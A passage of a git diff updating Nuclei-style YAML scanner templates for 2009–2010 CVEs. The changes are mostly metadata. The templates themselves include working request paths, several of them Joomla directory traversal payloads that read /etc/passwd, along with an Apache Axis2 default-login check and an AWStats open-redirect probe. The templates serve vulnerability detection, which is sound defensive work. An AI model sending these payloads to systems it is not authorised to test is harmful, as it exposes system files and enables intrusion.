CVE-2009-4223 cwe-id: CWE-94 - cvss-score: 7.5 - tags: cve,cve2009,krweb,rfi,edb + epss-score: 0.01041 + epss-percentile: 0.82315 + cpe: cpe:2.3:a:gianni_tommasi:kr-php_web_content_server:*:beta_2:*:*:*:*:*:* metadata: max-request: 1 + vendor: gianni_tommasi + product: kr-php_web_content_server + tags: cve,cve2009,krweb,rfi,edb http: - method: GET @@ -27,12 +34,13 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: word part: interactsh_protocol words: - "http" -# Enhanced by mp on 2022/06/06 + - type: status + status: + - 200 + +# digest: 490a0046304402203ca9e6616dbf5792ef73b973153c924b0d82b3e931d8fbf0e730e1de78666fec0220409d6863e8116c0abf023950081eec3f3ac2b3faed7c33701121f0072da97c8d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-4679.yaml b/http/cves/2009/CVE-2009-4679.yaml index 7bd3d866fb..9b3795a47a 100644 --- a/http/cves/2009/CVE-2009-4679.yaml +++ b/http/cves/2009/CVE-2009-4679.yaml @@ -6,19 +6,25 @@ info: severity: high description: | Joomla! Portfolio Nexus 1.5 contains a remote file inclusion vulnerability in the inertialFATE iF (com_if_nexus) component that allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Apply the latest security patches and updates provided by Joomla! to fix the Remote File Inclusion vulnerability. reference: - https://www.exploit-db.com/exploits/33440 - https://nvd.nist.gov/vuln/detail/CVE-2009-4679 - - http://web.archive.org/web/20140722130146/http://secunia.com/advisories/37760/ - http://www.exploit-db.com/exploits/10754 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2009-4679 cwe-id: CWE-22 - cvss-score: 7.5 - tags: cve,cve2009,joomla,lfi,nexus,edb + epss-score: 0.00826 + epss-percentile: 0.80043 + cpe: cpe:2.3:a:inertialfate:com_if_nexus:1.5:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: inertialfate + product: com_if_nexus + tags: cve,cve2009,joomla,lfi,nexus,edb http: - method: GET @@ -27,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/08 +# digest: 4b0a004830460221009194f7f20d6b2b9a4f05ee6ed37e01443c713e46cc08b72aecacda56fc1c29210221009a4ba231e38c132608cabd17ba8784ccbd01108cc521bb5d58805f1c7911a262:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-5020.yaml b/http/cves/2009/CVE-2009-5020.yaml index 965ee5713c..503b9f0c50 100644 --- a/http/cves/2009/CVE-2009-5020.yaml +++ b/http/cves/2009/CVE-2009-5020.yaml @@ -5,24 +5,30 @@ info: author: pdteam severity: medium description: An open redirect vulnerability in awredir.pl in AWStats < 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. + remediation: Apply all relevant security patches and product upgrades. reference: - https://nvd.nist.gov/vuln/detail/CVE-2009-5020 - http://awstats.sourceforge.net/docs/awstats_changelog.txt - remediation: Apply all relevant security patches and product upgrades. classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:P + cvss-score: 5.8 cve-id: CVE-2009-5020 - cwe-id: CWE-601 - tags: cve,cve2009,redirect,awstats + cwe-id: CWE-20 + epss-score: 0.00215 + epss-percentile: 0.59314 + cpe: cpe:2.3:a:awstats:awstats:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: awstats + product: awstats + tags: cve,cve2009,redirect,awstats http: - method: GET path: - '{{BaseURL}}/awstats/awredir.pl?url=interact.sh' - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=interact.sh' + stop-at-first-match: true matchers: - type: regex @@ -30,4 +36,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# Enhanced by mp on 2022/02/13 +# digest: 4a0a00473045022100e2ff72616dd772779552d252be606a8d4995ce91d1bf943c1b9dcc8d870540fd02202002cab44c0f3f9e0485ec51fc0c94163d869846a7fb8fa57cee48437d1343d9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-5114.yaml b/http/cves/2009/CVE-2009-5114.yaml index dc3a007cc8..2305899dca 100644 --- a/http/cves/2009/CVE-2009-5114.yaml +++ b/http/cves/2009/CVE-2009-5114.yaml @@ -3,33 +3,41 @@ id: CVE-2009-5114 info: name: WebGlimpse 2.18.7 - Directory Traversal author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter. + remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/36994 - https://nvd.nist.gov/vuln/detail/CVE-2009-5114 - http://websecurity.com.ua/2628/ - https://exchange.xforce.ibmcloud.com/vulnerabilities/74321 - remediation: Apply all relevant security patches and product upgrades. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2009-5114 cwe-id: CWE-22 - cvss-score: 5.0 - tags: edb,cve,cve2009,lfi + epss-score: 0.02357 + epss-percentile: 0.88596 + cpe: cpe:2.3:a:iwork:webglimpse:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: iwork + product: webglimpse + tags: edb,cve,cve2009,lfi http: - method: GET path: - "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/13 + +# digest: 4b0a00483046022100efc9a19441ff1e01dd899e2623c478e7b349cb0754b0bb88da8f2cf9e0f9fddc0221008db344560c32476a8ab53278753ff6f5095671c3afff0bd2849293c7f630e39f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0157.yaml b/http/cves/2010/CVE-2010-0157.yaml index 5085dd1492..acfc868953 100644 --- a/http/cves/2010/CVE-2010-0157.yaml +++ b/http/cves/2010/CVE-2010-0157.yaml @@ -5,31 +5,38 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/10943 - https://nvd.nist.gov/vuln/detail/CVE-2010-0157 - - http://web.archive.org/web/20151023032409/http://secunia.com/advisories/37896/ - http://packetstormsecurity.org/1001-exploits/joomlabiblestudy-lfi.txt - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2010-0157 cwe-id: CWE-22 - cvss-score: 7.5 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.00826 + epss-percentile: 0.80043 + cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomla + product: joomla\! + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET path: - "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/13 + +# digest: 490a0046304402204e50dadeea60fab80521b5856d4a9a76d389e3227b045ea06e176bc8941e1fff022056df49279b99914765e4314c59335ceada817318b06191b7b511b9321e5cf976:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0219.yaml b/http/cves/2010/CVE-2010-0219.yaml index b6b2ca198a..4323a9147b 100644 --- a/http/cves/2010/CVE-2010-0219.yaml +++ b/http/cves/2010/CVE-2010-0219.yaml @@ -3,20 +3,28 @@ id: CVE-2010-0219 info: name: Apache Axis2 Default Login author: pikpikcu - severity: high + severity: critical description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service. + remediation: | + Disable or restrict access to the Axis2 web interface, or apply the necessary patches or updates provided by the vendor. reference: - https://nvd.nist.gov/vuln/detail/CVE-2010-0219 - https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html - http://www.rapid7.com/security-center/advisories/R7-0037.jsp - http://www.vupen.com/english/advisories/2010/2673 + - http://retrogod.altervista.org/9sg_ca_d2d.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C cvss-score: 10 cve-id: CVE-2010-0219 cwe-id: CWE-255 + epss-score: 0.975 + epss-percentile: 0.99974 + cpe: cpe:2.3:a:apache:axis2:1.3:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: apache + product: axis2 shodan-query: http.html:"Apache Axis" tags: cve,cve2010,axis,apache,default-login,axis2 @@ -28,7 +36,6 @@ http: Content-Type: application/x-www-form-urlencoded loginUsername={{username}}&loginPassword={{password}} - - | POST /axis2/axis2-admin/login HTTP/1.1 Host: {{Hostname}} @@ -45,7 +52,6 @@ http: matchers-condition: and matchers: - - type: word words: - "

Welcome to Axis2 Web Admin Module !!

" @@ -54,4 +60,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/02 +# digest: 4a0a00473045022100ee66a81cf0b38e51042293f4a1dddc8aa8dba47774371e9d19eb48829eea21f80220368383c23f0e6b0c8f3c52120ae93ac76e1e4c2e52c9bdeb83814ca2c54f6ead:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0467.yaml b/http/cves/2010/CVE-2010-0467.yaml index 45b762be10..ef273cec37 100644 --- a/http/cves/2010/CVE-2010-0467.yaml +++ b/http/cves/2010/CVE-2010-0467.yaml @@ -5,32 +5,40 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php. + remediation: Apply all relevant security patches and upgrades. reference: - https://www.exploit-db.com/exploits/11282 - https://nvd.nist.gov/vuln/detail/CVE-2010-0467 - - http://web.archive.org/web/20210121194037/https://www.securityfocus.com/bid/37987/ - http://www.chillcreations.com/en/blog/ccnewsletter-joomla-newsletter/ccnewsletter-106-security-release.html - remediation: Apply all relevant security patches and upgrades. + - http://www.exploit-db.com/exploits/11277 + - http://www.exploit-db.com/exploits/11282 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N cvss-score: 5.8 cve-id: CVE-2010-0467 cwe-id: CWE-22 epss-score: 0.0586 - tags: cve,cve2010,joomla,lfi,edb + epss-percentile: 0.92574 + cpe: cpe:2.3:a:chillcreations:com_ccnewsletter:1.0.5:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: chillcreations + product: com_ccnewsletter + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/13 + +# digest: 4a0a00473045022067f075ba27437d82eab7b5ef158b4d52a4132877e2cbbf4cd081f1afc6671baf022100d046ce930a94c152b4ed7562be8dd9964e95ce9c5c648a4cee58108c36169e75:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0696.yaml b/http/cves/2010/CVE-2010-0696.yaml index 82253c57fe..f7967e7e43 100644 --- a/http/cves/2010/CVE-2010-0696.yaml +++ b/http/cves/2010/CVE-2010-0696.yaml @@ -3,34 +3,41 @@ id: CVE-2010-0696 info: name: Joomla! Component Jw_allVideos - Arbitrary File Retrieval author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/11447 - https://nvd.nist.gov/vuln/detail/CVE-2010-0696 - - http://web.archive.org/web/20140805102632/http://secunia.com/advisories/38587/ - http://www.joomlaworks.gr/content/view/77/34/ - remediation: Upgrade to a supported version. + - http://www.exploit-db.com/exploits/11447 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-0696 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.62698 + epss-percentile: 0.97464 + cpe: cpe:2.3:a:joomlaworks:jw_allvideos:3.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlaworks + product: jw_allvideos + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/13 +# digest: 4b0a00483046022100ab56f6047c7b9bd11ea24cf26b256d07038a4a29580c3a48ad26e7b106893333022100b20cc596aa243c544d45c1c315cdccba8d896dfaeb22f73bb2dfac6c69707d7b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0759.yaml b/http/cves/2010/CVE-2010-0759.yaml index c1fa28cb28..090f0b4767 100644 --- a/http/cves/2010/CVE-2010-0759.yaml +++ b/http/cves/2010/CVE-2010-0759.yaml @@ -5,31 +5,39 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/11498 - https://nvd.nist.gov/vuln/detail/CVE-2010-0759 - - http://web.archive.org/web/20151104183037/http://secunia.com/advisories/38637/ - - http://web.archive.org/web/20210121194344/https://www.securityfocus.com/bid/38296/ - remediation: Upgrade to a supported version. + - http://www.exploit-db.com/exploits/11498 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/56380 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-0759 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,plugin,edb + epss-score: 0.01326 + epss-percentile: 0.84541 + cpe: cpe:2.3:a:greatjoomla:scriptegrator_plugin:1.4.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: greatjoomla + product: scriptegrator_plugin + tags: cve,cve2010,joomla,lfi,plugin,edb http: - method: GET path: - "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/13 + +# digest: 4a0a004730450221009f82d29d04e30aa66bfaabc7e2e42b06f972f9ed73c909e0bf169f141cc0726c02201b396898a24db3b07285628139b48bad19f8327a47e7b1468a6c009c14d4798c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0942.yaml b/http/cves/2010/CVE-2010-0942.yaml index 1610c0053f..970f436774 100644 --- a/http/cves/2010/CVE-2010-0942.yaml +++ b/http/cves/2010/CVE-2010-0942.yaml @@ -3,32 +3,41 @@ id: CVE-2010-0942 info: name: Joomla! Component com_jvideodirect - Directory Traversal author: daffainfo - severity: high + severity: medium description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/11089 - https://nvd.nist.gov/vuln/detail/CVE-2010-0942 - http://packetstormsecurity.org/1001-exploits/joomlajvideodirect-traversal.txt - remediation: Apply all relevant security patches and product upgrades. + - https://exchange.xforce.ibmcloud.com/vulnerabilities/55513 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-0942 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,packetstorm,cve + epss-score: 0.00477 + epss-percentile: 0.7305 + cpe: cpe:2.3:a:jvideodirect:com_jvideodirect:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: jvideodirect + product: com_jvideodirect + tags: cve2010,joomla,lfi,edb,packetstorm,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/13 + +# digest: 490a0046304402204a24673f56aa5c85ff48724f63012acea7d3382efe57ca0634ec7c36054b769a0220084b2486877c720086805f01de57b457dda29fe6b21f566e6f301ddd9b1f7f9f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0943.yaml b/http/cves/2010/CVE-2010-0943.yaml index d5cea18134..f043c571c7 100644 --- a/http/cves/2010/CVE-2010-0943.yaml +++ b/http/cves/2010/CVE-2010-0943.yaml @@ -3,33 +3,41 @@ id: CVE-2010-0943 info: name: Joomla! Component com_jashowcase - Directory Traversal author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php. + remediation: | + Update to the latest version of Joomla! Component com_jashowcase to fix the directory traversal vulnerability. reference: - https://www.exploit-db.com/exploits/11090 - https://nvd.nist.gov/vuln/detail/CVE-2010-0943 - - http://web.archive.org/web/20210121193737/https://www.securityfocus.com/bid/37692/ - - http://web.archive.org/web/20140724215426/http://secunia.com/advisories/33486/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/55512 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-0943 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,cve + epss-score: 0.01155 + epss-percentile: 0.83278 + cpe: cpe:2.3:a:joomlart:com_jashowcase:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlart + product: com_jashowcase + tags: cve2010,joomla,lfi,edb,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/03/30 +# digest: 490a0046304402203b428f2d632d594f674fea04e8a99bb1950cedf35200782d84dcca2917913afe0220256e2fdb392f182755558229ac57469b31bee192c7b07f63c5d2572f6d5e45cb:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0944.yaml b/http/cves/2010/CVE-2010-0944.yaml index 91074a1ed3..26fdae1f3f 100644 --- a/http/cves/2010/CVE-2010-0944.yaml +++ b/http/cves/2010/CVE-2010-0944.yaml @@ -3,33 +3,42 @@ id: CVE-2010-0944 info: name: Joomla! Component com_jcollection - Directory Traversal author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/11088 - https://nvd.nist.gov/vuln/detail/CVE-2010-0944 - http://packetstormsecurity.org/1001-exploits/joomlajcollection-traversal.txt - http://www.exploit-db.com/exploits/11088 - remediation: Apply all relevant security patches and product upgrades. + - https://exchange.xforce.ibmcloud.com/vulnerabilities/55514 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-0944 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,packetstorm,cve + epss-score: 0.00477 + epss-percentile: 0.7305 + cpe: cpe:2.3:a:thorsten_riess:com_jcollection:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: thorsten_riess + product: com_jcollection + tags: cve2010,joomla,lfi,edb,packetstorm,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/13 + +# digest: 4b0a00483046022100d28929c969fa1f34d40f6ee1c70b0502772a956f347081368ff463ce5d570d85022100b109747ce42bc73f4d3313dca4414fc3d484f1e38e6d57a8b08789e70f8e7f23:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0972.yaml b/http/cves/2010/CVE-2010-0972.yaml index 43c553048a..d7363a099b 100644 --- a/http/cves/2010/CVE-2010-0972.yaml +++ b/http/cves/2010/CVE-2010-0972.yaml @@ -5,31 +5,39 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/11738 - https://nvd.nist.gov/vuln/detail/CVE-2010-0972 - - http://web.archive.org/web/20140804152652/http://secunia.com/advisories/38925/ - http://www.exploit-db.com/exploits/11738 - remediation: Apply all relevant security patches and product upgrades. + - https://exchange.xforce.ibmcloud.com/vulnerabilities/56863 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-0972 cwe-id: CWE-22 - tags: edb,cve,cve2010,joomla,lfi + epss-score: 0.00813 + epss-percentile: 0.79883 + cpe: cpe:2.3:a:g4j.laoneo:com_gcalendar:2.1.5:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: g4j.laoneo + product: com_gcalendar + tags: edb,cve,cve2010,joomla,lfi http: - method: GET path: - "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/13 + +# digest: 4a0a0047304502204e4b197df62891adb6c8e870aa1c97cbca74cc9a8165319a8ba0e2080ab491c002210084079964a1109bbaef51e29333221d6e36cd7e3dad60a602d238d54f74b39c1e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0982.yaml b/http/cves/2010/CVE-2010-0982.yaml index 00613d5a2f..5e68e7b281 100644 --- a/http/cves/2010/CVE-2010-0982.yaml +++ b/http/cves/2010/CVE-2010-0982.yaml @@ -3,33 +3,39 @@ id: CVE-2010-0982 info: name: Joomla! Component com_cartweberp - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/10942 - https://nvd.nist.gov/vuln/detail/CVE-2010-0982 - - http://web.archive.org/web/20210121193625/https://www.securityfocus.com/bid/37581/ - - http://web.archive.org/web/20151104182451/http://secunia.com/advisories/37917/ - remediation: Apply all relevant security patches and product upgrades. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N cvss-score: 4.3 cve-id: CVE-2010-0982 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.0087 + epss-percentile: 0.80545 + cpe: cpe:2.3:a:joomlamo:com_cartweberp:1.56.75:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlamo + product: com_cartweberp + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/13 + +# digest: 4a0a00473045022100cbfc6f184eb1a4f0115dff7cffbb5018f530c02cc260e340d73176a7f3668f650220292e1eeb29585fef8f580f5aaf90d4c96d2d9cd237108b57732b1f66a43a327e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0985.yaml b/http/cves/2010/CVE-2010-0985.yaml index 57ac47a224..ed9f1932e3 100644 --- a/http/cves/2010/CVE-2010-0985.yaml +++ b/http/cves/2010/CVE-2010-0985.yaml @@ -5,31 +5,39 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/10948 - https://nvd.nist.gov/vuln/detail/CVE-2010-0985 - - http://web.archive.org/web/20210623092041/https://www.securityfocus.com/bid/37560 - http://www.exploit-db.com/exploits/10948 - remediation: Apply all relevant security patches and product upgrades. + - https://exchange.xforce.ibmcloud.com/vulnerabilities/55348 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-0985 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01222 + epss-percentile: 0.83811 + cpe: cpe:2.3:a:chris_simon:com_abbrev:1.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: chris_simon + product: com_abbrev + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/13 + +# digest: 4a0a00473045022100e3c051116066926152d776ec9deb55581bc4a7afe92b92909142fa50692e6fef022059817440f94ad60f8c058adbaa689541520273bced8088b45ada0c31d8ec4a99:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1056.yaml b/http/cves/2010/CVE-2010-1056.yaml index 59d9cb2d9e..9b93a0b4d9 100644 --- a/http/cves/2010/CVE-2010-1056.yaml +++ b/http/cves/2010/CVE-2010-1056.yaml @@ -3,33 +3,41 @@ id: CVE-2010-1056 info: name: Joomla! Component com_rokdownloads - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/11760 - https://nvd.nist.gov/vuln/detail/CVE-2010-1056 - - http://web.archive.org/web/20210121194803/https://www.securityfocus.com/bid/38741/ - - http://web.archive.org/web/20151023104850/http://secunia.com/advisories/38982/ - remediation: Apply all relevant security patches and product upgrades. + - http://www.rockettheme.com/extensions-updates/638-rokdownloads-10-released + - https://exchange.xforce.ibmcloud.com/vulnerabilities/56898 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1056 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.06484 + epss-percentile: 0.92928 + cpe: cpe:2.3:a:rockettheme:com_rokdownloads:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: rockettheme + product: com_rokdownloads + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/13 + +# digest: 490a0046304402203f91a611acec7b76b8b694381bcc008f277c2db6ed4daa778ac2b15ea34edd8f0220134ab12d7b3a7a29d0bc10d686d900349f10a196560a9a9c49a7168bddcc2f0a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1081.yaml b/http/cves/2010/CVE-2010-1081.yaml index db57c1558c..002ca7aa28 100644 --- a/http/cves/2010/CVE-2010-1081.yaml +++ b/http/cves/2010/CVE-2010-1081.yaml @@ -3,32 +3,40 @@ id: CVE-2010-1081 info: name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/11511 - https://nvd.nist.gov/vuln/detail/CVE-2010-1081 - http://www.corejoomla.com/component/content/article/1-corejoomla-updates/40-community-polls-v153-security-release.html - remediation: Apply all relevant security patches and product upgrades. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1081 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.0168 + epss-percentile: 0.86284 + 